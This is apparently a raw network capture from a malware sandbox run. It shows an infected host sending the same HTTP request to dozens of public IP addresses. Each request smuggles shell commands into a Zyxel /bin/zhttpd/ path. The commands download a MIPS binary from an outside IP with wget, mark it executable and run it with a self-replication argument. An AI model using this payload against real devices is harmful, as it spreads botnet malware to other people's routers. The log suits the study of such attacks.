                                              Jan 29, 2024 07:03:47.968205929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3783192.168.2.143655260.117.216.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968255997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3784192.168.2.1436626123.1.226.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968307972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3785192.168.2.143910877.106.47.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968327045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3786192.168.2.1442060178.198.8.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968372107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3787192.168.2.145745413.74.52.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968415022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3788192.168.2.14554845.200.186.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968453884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3789192.168.2.144439262.183.175.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968494892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3790192.168.2.143357097.118.7.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968528032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3791192.168.2.14383464.137.127.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968564987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3792192.168.2.1453762105.194.192.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968606949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3793192.168.2.1440218186.28.149.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968652010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3794192.168.2.144766297.41.250.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968684912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3795192.168.2.144663865.156.26.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968739986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3796192.168.2.1448352189.193.112.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968774080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3797192.168.2.144499812.179.84.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968801975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3798192.168.2.1457012100.202.197.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968849897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3799192.168.2.14353604.209.135.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968857050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3800192.168.2.146086886.109.232.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968903065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3801192.168.2.143331484.80.139.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968951941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3802192.168.2.144376651.57.247.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.968976021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3803192.168.2.145896465.227.22.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969012976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3804192.168.2.143760459.179.109.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969036102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3805192.168.2.143650042.148.95.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969089985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3806192.168.2.1449488209.192.49.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969127893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3807192.168.2.144733046.224.208.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969152927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3808192.168.2.14607885.147.254.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969177961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3809192.168.2.1453628153.154.19.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969207048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3810192.168.2.1436554132.149.181.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969238043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3811192.168.2.1443752138.249.208.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969274998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3812192.168.2.1440722202.13.27.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969307899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3813192.168.2.143711838.0.181.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969341040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3814192.168.2.1444762144.245.54.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969373941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3815192.168.2.1455234107.156.104.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969414949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3816192.168.2.1451358153.252.122.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969454050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3817192.168.2.144397878.44.219.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969516039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3818192.168.2.14454545.102.161.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969559908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3819192.168.2.1455754166.145.203.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969582081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3820192.168.2.145204487.129.29.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969621897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3821192.168.2.1436164171.51.219.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969672918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3822192.168.2.1439578155.31.145.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969702005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3823192.168.2.1452594208.187.57.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969748020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3824192.168.2.143699689.155.54.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969778061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3825192.168.2.145653858.121.159.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969835043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3826192.168.2.145884432.135.68.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969880104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3827192.168.2.143535873.117.71.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969907045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3828192.168.2.1454760183.3.115.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969938040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3829192.168.2.1439570184.112.222.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.969983101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3830192.168.2.1457474213.118.243.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970005989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3831192.168.2.1432936179.67.36.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970051050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3832192.168.2.1458770139.6.169.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970101118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3833192.168.2.144272087.127.178.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970149040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3834192.168.2.1434028153.141.125.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970190048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3835192.168.2.1459914195.133.83.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970217943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3836192.168.2.145820265.96.219.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970257044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3837192.168.2.143562474.174.181.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970302105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3838192.168.2.1449820178.198.231.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970344067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3839192.168.2.1448866154.23.193.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970371008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3840192.168.2.144899653.26.120.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970415115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3841192.168.2.144752845.144.155.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970449924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3842192.168.2.143756463.215.129.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970493078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3843192.168.2.1451770110.42.7.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970525026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3844192.168.2.144766470.96.130.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970545053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3845192.168.2.143785262.49.250.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:47.970594883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3846192.168.2.144238486.185.248.165443
                                              TimestampBytes transferredDirectionData
